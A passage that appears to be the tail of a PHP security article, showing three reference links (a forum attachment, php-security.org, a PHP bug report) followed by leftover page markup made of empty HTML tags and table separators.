[1] http://bbs.phpchina.com/attachment.php?aid=22294
[2] http://www.php-security.org/
[3] http://bugs.php.net/bug.php?id=40114
-EOF-
|
| |
|
| <![CDATA[<span id="7ztzv"></span>]]><![CDATA[<form id="7ztzv"></form>]]> | | |
|
<![CDATA[<span id="7ztzv"></span>]]> |
|
|
|
|
<![CDATA[<address id="7ztzv"></address>]]>
| |